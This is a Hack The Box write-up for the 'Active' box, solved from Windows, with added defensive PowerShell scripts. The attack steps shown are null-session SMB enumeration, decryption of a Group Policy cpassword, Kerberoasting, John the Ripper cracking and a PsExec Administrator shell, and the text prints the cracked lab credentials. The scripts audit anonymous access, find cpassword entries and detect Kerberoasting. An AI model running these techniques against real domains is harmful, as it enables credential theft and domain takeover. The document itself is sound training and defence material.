Hackthebox Writeup — “Active” using only Windows

Vegard Wærp
5 min read · May 12, 2019


I spend some time on hackthebox, both for pure fun and for the training. After completing the retired box “Active” on hackthebox, I thought it would be interesting to solve the box again using only Windows, instead of using Kali Linux as I usually do, and document it with a walkthrough.

The tools I used were the dev branch of PowerSploit, the latest automated build of John the Ripper jumbo, nmap for Windows and Sysinternals PsExec.

As Windows Defender flags parts of PowerSploit, the first step is to disable real-time protection in Windows Defender before loading the PowerSploit module. Remember to re-enable it afterwards, as running Windows without antivirus is a Bad Idea™.

Real-time protection disabled in Windows

First we load the PowerSploit module using the Import-Module command, supplying the full path to PowerSploit.psm1 (ignore the error message about the git directory):

After loading PowerSploit, our first step is to perform a port scan, using nmap for Windows:

We see what looks like an Active Directory domain controller for the domain active.htb, running Windows Server 2008 R2 SP1.

Let’s first see if we can find something on the SMB server. If we just try to browse the server in a Windows Explorer window we are asked for a username and password. To see if we can browse any shares anonymously we have to create a null session in the console using the net use command, then view the shares using net view (this command had to be executed in a cmd console; when attempting it in a PowerShell console an error message was displayed):

C:\Users\vegard>net use \\10.10.10.100\ipc$ "" /user:""
The command completed successfully.
C:\Users\vegard>net view \\10.10.10.100
Shared resources at \\10.10.10.100

Domain Controller

Share name   Type  Used as  Comment

-------------------------------------------------------------------------------
NETLOGON     Disk           Logon server share
Replication  Disk
SYSVOL       Disk           Logon server share
Users        Disk
The command completed successfully.

After creating the null session, we can also browse the shares using Windows Explorer, and we see that we have access to the Replication share:
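Seen from the defender’s side, the null session that made this enumeration possible comes down to a handful of server settings. The following PowerShell audit is an added example and not part of the original writeup: run elevated on the file server or domain controller being checked, it reports the anonymous-access registry values against their hardened settings and, where the SmbShare module exists (Server 2012 and later, so not on this box’s 2008 R2), any share permission granted to Everyone or ANONYMOUS LOGON. The registry paths and value names are the documented Windows ones; the recommended values follow the usual hardening baseline.

```powershell
# Added example (not part of the original writeup): audit the local settings that
# decide whether anonymous (null-session) users can enumerate and read shares.
# Run in an elevated PowerShell on the server being checked. "<not set>" means
# the OS default applies and the value should be reviewed explicitly.
$checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RestrictAnonymous';          Want = 1; Note = 'Do not allow anonymous enumeration of SAM accounts and shares' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'RestrictAnonymousSAM';       Want = 1; Note = 'Do not allow anonymous enumeration of SAM accounts' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
       Name = 'EveryoneIncludesAnonymous';  Want = 0; Note = 'Everyone permissions must not apply to anonymous users' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
       Name = 'RestrictNullSessAccess';     Want = 1; Note = 'Null sessions only reach shares listed in NullSessionShares' }
)

foreach ($c in $checks) {
    $item   = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    $actual = if ($item) { $item.($c.Name) } else { '<not set>' }
    [pscustomobject]@{
        Setting     = $c.Name
        Actual      = $actual
        Recommended = $c.Want
        Status      = if ($actual -eq $c.Want) { 'OK' } else { 'REVIEW' }
        Note        = $c.Note
    }
}

# Shares explicitly opened to null sessions; this list should be empty on a domain controller.
$srv = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -ErrorAction SilentlyContinue
$nullShares = @($srv.NullSessionShares | Where-Object { $_ })
if ($nullShares) { "NullSessionShares: $($nullShares -join ', ')" } else { 'NullSessionShares: (none)' }

# Share permissions granted to Everyone or ANONYMOUS LOGON (needs the SmbShare
# module, Server 2012 / Windows 8 and later); a read-enabled Replication share
# like the one on this box would show up here.
if (Get-Command Get-SmbShare -ErrorAction SilentlyContinue) {
    Get-SmbShare | Get-SmbShareAccess |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.AccountName -match 'Everyone|ANONYMOUS LOGON' } |
        Select-Object Name, AccountName, AccessRight
}
```

The registry part answers the question “can an unauthenticated client list shares at all”, the share-permission part answers “which shares can it then read”; on this box both were open, which is what let the Replication share be browsed without credentials.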

Browsing Replication share

We can also enumerate the share using the command line, and find the file Groups.xml:

C:\Users\vegard>dir /s /b \\10.10.10.100\Replication
\\10.10.10.100\Replication\active.htb
\\10.10.10.100\Replication\active.htb\Policies
\\10.10.10.100\Replication\active.htb\scripts
\\10.10.10.100\Replication\active.htb\DfsrPrivate\ConflictAndDeleted
\\10.10.10.100\Replication\active.htb\DfsrPrivate\Deleted
\\10.10.10.100\Replication\active.htb\DfsrPrivate\Installing
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
C:\Users\vegard>type \\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

For decrypting GPP passwords, PowerSploit has a function called Get-GPPPassword that searches the domain controller and decrypts any passwords it finds. Get-GPPPassword won’t work here since we are not joined to the domain, but looking at the source code we find the internal function that does the decryption:

After pasting the function definition into the PowerShell console, Get-DecryptedPassword can be used to decrypt the password:

And we got a set of creds, username active.htb\SVC_TGS and password GPPstillStandingStrong2k18.
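What makes Groups.xml dangerous is exactly that cpassword attribute, and the fix on the defending side is to find and remove every such entry (and change the affected account’s password). The script below is an added example, my own code and not from the writeup or from PowerSploit: it walks a Policies folder for the six Group Policy Preference file types that can embed credentials and lists each item carrying a cpassword, with the account it belongs to and whether the value is still set. The default path assumes the standard SYSVOL layout of the caller’s own domain, and the function name Find-GppCpassword is my own.

```powershell
# Added example (not part of the original writeup): find Group Policy Preference
# XML files in SYSVOL that still carry a cpassword attribute. After MS14-025 the
# right fix is to delete the preference item (or clear the password) and change
# the account's password, because the stored value is recoverable. The default
# path assumes the standard SYSVOL layout of the caller's own domain; pass
# another Policies folder (for example a copy of a replica share) if needed.
function Find-GppCpassword {
    param(
        [string] $PoliciesPath = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies"
    )
    # Preference types that can embed credentials.
    $gppFiles = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'

    foreach ($file in Get-ChildItem -Path $PoliciesPath -Recurse -Include $gppFiles -File -ErrorAction SilentlyContinue) {
        try { $xml = [xml](Get-Content -Path $file.FullName -Raw -ErrorAction Stop) } catch { continue }

        # Every element carrying a cpassword attribute, whatever the preference type.
        foreach ($props in $xml.SelectNodes('//*[@cpassword]')) {
            $parent = $props.ParentNode -as [System.Xml.XmlElement]

            # The account name lives in a type-specific attribute of the Properties
            # element (userName, accountName, runAs); fall back to the parent item's name.
            $account = foreach ($attr in 'userName', 'accountName', 'runAs') {
                if ($props.GetAttribute($attr)) { $props.GetAttribute($attr); break }
            }
            if (-not $account -and $parent) { $account = $parent.GetAttribute('name') }

            [pscustomobject]@{
                PolicyGuid   = ($file.FullName -split '\\Policies\\')[1] -replace '\\.*$', ''
                File         = $file.Name
                Account      = $account
                Changed      = if ($parent) { $parent.GetAttribute('changed') } else { '' }
                CpasswordSet = $props.GetAttribute('cpassword') -ne ''   # "" means the password was already cleared
            }
        }
    }
}

# Usage: list every GPP item with a stored password, most recently changed first.
Find-GppCpassword | Sort-Object Changed -Descending | Format-Table -AutoSize
```

Run against the Policies folder of this box it would report the {31B2F340-016D-11D2-945F-00C04FB984F9} policy, Groups.xml, account active.htb\SVC_TGS, CpasswordSet true. The script deliberately stops at detection: once an entry shows up, the value has to be treated as compromised regardless of what it decrypts to.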

To use the new creds for SMB, we first delete the null session using the following command in a cmd console: net use \\10.10.10.100\ipc$ /delete, and then browse to \\10.10.10.100 in Windows Explorer, entering the creds when asked for username and password. Having done that, we can browse the \\10.10.10.100\Users share and find the user.txt file:

user.txt

After getting user.txt I poked around in the Users share, looking for anything to help me with privilege escalation and getting root.txt, but didn’t find anything special. Since we are dealing with an AD domain controller, my next step was to try Kerberoasting, using Invoke-Kerberoast from PowerSploit.

My first try was to start PowerShell with the network credentials of active.htb\SVC_TGS using runas /netonly, and then run Invoke-Kerberoast, but that failed with an error message about being unable to create a Kerberos credential:

First attempt at Invoke-Kerberoast

After some googling, it looked like the error was because Windows uses only NTLM instead of Kerberos when the computer is not domain joined, but that one could force Kerberos usage for a realm using the ksetup command as Administrator.

So we open an Administrator console and enter the following commands, and then reboot:

ksetup /addkdc ACTIVE.HTB 10.10.10.100
ksetup /setrealm ACTIVE.HTB
Adding KDC and setting default Kerberos realm

After rebooting and re-disabling Windows Defender, we try the Kerberoasting again, and get a hash for administrator:

Kerberoasting

To attempt cracking the hash using JtR jumbo, we copy it to a text file, removing all whitespace and line breaks, and also removing the text “:445”: john uses colons as field separators, so the hash won’t load with the colon there. John is then executed with:

C:\john\run\john.exe --wordlist=rockyou.txt kerberoast.txt
Cracking the kerberoasted hash with JtR

We managed to crack the Administrator password, and got the Administrator creds: active.htb\Administrator:Ticketmaster1968.
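From the detection side, Kerberoasting leaves a recognisable trace in Security event 4769 on the domain controller: a successful TGS request for a service run by a user account (not a computer account, not krbtgt) with RC4 encryption (type 0x17), which is what roasting tools ask for to get a cheaply crackable hash, and typically several of them from one client in quick succession. The PowerShell below is an added example and not from the writeup: ConvertFrom-Event4769 flattens real 4769 records, and Find-KerberoastIndicators flags the RC4 requests and groups them per client, marking bursts. Both function names and the sample records at the end are my own constructions; the account names echo this box for illustration only.

```powershell
# Added example (not part of the original writeup): flag Kerberoast-style ticket
# requests in Security event 4769 on a domain controller. Indicator: a successful
# TGS request (Status 0x0) for a service that is a user account, with RC4
# encryption (TicketEncryptionType 0x17); one client collecting several such
# tickets in a short window strengthens it. The sample records at the end are
# constructed for illustration; field names follow the 4769 event schema.

function ConvertFrom-Event4769 {
    # Flatten a real 4769 EventLogRecord into the fields the detection needs.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $data = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.GetAttribute('Name')] = $d.InnerText }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            Requester = $data['TargetUserName']
            Service   = $data['ServiceName']
            EncType   = $data['TicketEncryptionType']
            ClientIp  = $data['IpAddress'] -replace '^::ffff:', ''   # 4769 logs IPv4 as an IPv4-mapped IPv6 address
            Status    = $data['Status']
        }
    }
}

function Find-KerberoastIndicators {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $BurstThreshold = 3,   # distinct user-account services from one client...
        [int] $WindowMinutes = 5     # ...within this many minutes counts as a burst
    )
    # Step 1: successful RC4 TGS requests for services that are not computer accounts or krbtgt.
    $suspect = $Events | Where-Object {
        $_.EncType -eq '0x17' -and $_.Status -eq '0x0' -and
        $_.Service -notmatch '\$$' -and $_.Service -notmatch '^krbtgt'
    }
    # Step 2: one row per requesting client with the services it collected.
    foreach ($grp in ($suspect | Group-Object ClientIp)) {
        $sorted   = @($grp.Group | Sort-Object Time)
        $services = @($sorted | Select-Object -ExpandProperty Service -Unique)
        $span     = $sorted[-1].Time - $sorted[0].Time
        [pscustomobject]@{
            ClientIp  = $grp.Name
            Requester = (@($sorted | Select-Object -ExpandProperty Requester -Unique) -join ', ')
            Services  = ($services -join ', ')
            Count     = $services.Count
            Burst     = ($services.Count -ge $BurstThreshold -and $span.TotalMinutes -le $WindowMinutes)
        }
    }
}

# Constructed sample records (not real log data), in the shape ConvertFrom-Event4769 produces.
$t0 = Get-Date '2019-05-12 10:00:00'
$sample = @(
    # Benign: AES (0x12) ticket for a file server's computer account.
    [pscustomobject]@{ Time = $t0; Requester = 'jdoe@ACTIVE.HTB'; Service = 'FILES01$'; EncType = '0x12'; ClientIp = '10.10.10.50'; Status = '0x0' },
    # Benign: RC4 request that failed (Status 0x7, service principal unknown), so no ticket was issued.
    [pscustomobject]@{ Time = $t0.AddSeconds(10); Requester = 'jdoe@ACTIVE.HTB'; Service = 'svc_sql'; EncType = '0x17'; ClientIp = '10.10.10.50'; Status = '0x7' },
    # Suspicious: one low-privilege account pulling RC4 tickets for several user-account services within seconds.
    [pscustomobject]@{ Time = $t0.AddSeconds(30); Requester = 'SVC_TGS@ACTIVE.HTB'; Service = 'svc_sql'; EncType = '0x17'; ClientIp = '10.10.14.3'; Status = '0x0' },
    [pscustomobject]@{ Time = $t0.AddSeconds(31); Requester = 'SVC_TGS@ACTIVE.HTB'; Service = 'svc_web'; EncType = '0x17'; ClientIp = '10.10.14.3'; Status = '0x0' },
    [pscustomobject]@{ Time = $t0.AddSeconds(32); Requester = 'SVC_TGS@ACTIVE.HTB'; Service = 'Administrator'; EncType = '0x17'; ClientIp = '10.10.14.3'; Status = '0x0' }
)
Find-KerberoastIndicators -Events $sample | Format-Table -AutoSize

# Live use on a domain controller (reading the Security log requires an elevated session):
# Find-KerberoastIndicators -Events (Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } -MaxEvents 5000 | ConvertFrom-Event4769)
```

On the sample data only the 10.10.14.3 row comes back, with three services and Burst set to true; the AES request and the failed RC4 request are filtered out in step 1. The cracked password above also shows the other half of the mitigation: an account with an SPN needs a long random password (or a group managed service account) precisely because anyone holding a valid domain account can request its ticket and attack it offline.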

Using the Administrator creds we can either browse \\10.10.10.100\Users to get root.txt, or use PsExec to get a shell and list the file.

Getting root.txt
Administrator shell using sysinternals PsExec

To remove your Windows box from the ACTIVE.HTB Kerberos realm when you are finished, execute the following command as Administrator and reboot:

ksetup /removerealm ACTIVE.HTB
